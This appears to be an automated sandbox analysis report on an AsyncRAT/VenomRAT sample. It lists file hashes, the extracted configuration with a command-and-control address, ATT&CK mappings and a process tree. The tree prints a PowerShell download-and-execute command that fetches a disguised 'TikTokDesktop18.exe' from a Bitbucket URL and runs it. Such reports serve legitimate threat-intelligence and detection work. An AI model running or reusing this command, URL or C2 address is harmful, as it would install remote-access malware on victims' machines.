asyncrat | b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8

General

Target

b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
Size

89KB
MD5

ee5fa211e0dfb2e96a3953d4bace7850
SHA1

65884c08e3876e8aeab4f5172d48e203e60ab75b
SHA256

b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8
SHA512

ff98b501ac22fdfc0b458b9e726388bbfe8d775e3988d83312a6551cdd57d21de1d87b3f8d9bdf4f9ec50cfda2e5b360e136d09e8f76000301e510ee63accf65
SSDEEP

1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3Oj:v7DhdC6kzWypvaQ0FxyNTBfAl

Score

10^/10

asyncrat venomrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

212.15.49.155:4449

Mutex

zuvtbmtrjnwecuy

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

Processes:

resource	yara_rule
behavioral2/memory/3136-32-0x0000000000540000-0x000000000056C000-memory.dmp	VenomRAT

Venomrat family
venomrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
4	4152	powershell.exe
8	4152	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

Processes:

TikTokDesktop18.exe

pid	Process
4636	TikTokDesktop18.exe

Loads dropped DLL 1 IoCs

Processes:

TikTokDesktop18.exe

pid	Process
4636	TikTokDesktop18.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
4152	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
3	bitbucket.org
4	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

Processes:

TikTokDesktop18.exe

description	pid	Process	procid_target
PID 4636 set thread context of 3136	4636	TikTokDesktop18.exe	89

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exeTikTokDesktop18.exeMSBuild.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTokDesktop18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exeMSBuild.exe

pid	Process
4152	powershell.exe
4152	powershell.exe
3136	MSBuild.exe
3136	MSBuild.exe
3136	MSBuild.exe
3136	MSBuild.exe
3136	MSBuild.exe
3136	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeMSBuild.exe

description	pid	Process
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	3136	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid	Process
3136	MSBuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.execmd.execmd.exeTikTokDesktop18.exe

description	pid	Process	procid_target
PID 3568 wrote to memory of 1996	3568	b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe	83
PID 3568 wrote to memory of 1996	3568	b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe	83
PID 1996 wrote to memory of 4152	1996	cmd.exe	84
PID 1996 wrote to memory of 4152	1996	cmd.exe	84
PID 1996 wrote to memory of 2608	1996	cmd.exe	85
PID 1996 wrote to memory of 2608	1996	cmd.exe	85
PID 2608 wrote to memory of 4636	2608	cmd.exe	86
PID 2608 wrote to memory of 4636	2608	cmd.exe	86
PID 2608 wrote to memory of 4636	2608	cmd.exe	86
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89
PID 4636 wrote to memory of 3136	4636	TikTokDesktop18.exe	89

C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
"C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3568
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- - C:\Windows\system32\cmd.exe
    cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
      C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4636
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B0D1.tmp\B0D2.tmp\B0D3.bat

Filesize
260B

MD5
1904675eec0f302424c4bde0956dab54

SHA1
267c3174e35e0e2a7d104f98b3326f313f2e464e

SHA256
45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6

SHA512
fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

Filesize
501KB

MD5
e619fff5751a713cf445da24a7a12c94

SHA1
9fc67a572c69158541aaaab0264607ada70a408c

SHA256
11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9

SHA512
07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csk0b3eh.uwp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\gdi32.dll

Filesize
256KB

MD5
8d662564d514751028c65d96c696271f

SHA1
8e27943b7b901a808d39a7ee6977e1d3769a15fb

SHA256
86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b

SHA512
0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef

Download Submit
memory/3136-37-0x0000000005100000-0x000000000510A000-memory.dmp

Filesize
40KB

Download
memory/3136-36-0x0000000005130000-0x00000000051C2000-memory.dmp

Filesize
584KB

Download
memory/3136-34-0x0000000005430000-0x00000000059D4000-memory.dmp

Filesize
5.6MB

Download
memory/3136-32-0x0000000000540000-0x000000000056C000-memory.dmp

Filesize
176KB

Download
memory/4152-13-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/4152-18-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/4152-14-0x00007FFCED2A0000-0x00007FFCEDD61000-memory.dmp

Filesize
10.8MB

Download
memory/4152-8-0x0000020D2C280000-0x0000020D2C2A2000-memory.dmp

Filesize
136KB

Download
memory/4152-2-0x00007FFCED2A3000-0x00007FFCED2A5000-memory.dmp

Filesize
8KB

Download
memory/4636-23-0x00000000002D0000-0x0000000000356000-memory.dmp

Filesize
536KB

Download
memory/4636-24-0x0000000002660000-0x0000000002666000-memory.dmp

Filesize
24KB

Download
memory/4636-25-0x000000000A920000-0x000000000AE4C000-memory.dmp

Filesize
5.2MB

Download
memory/4636-22-0x00000000747BE000-0x00000000747BF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads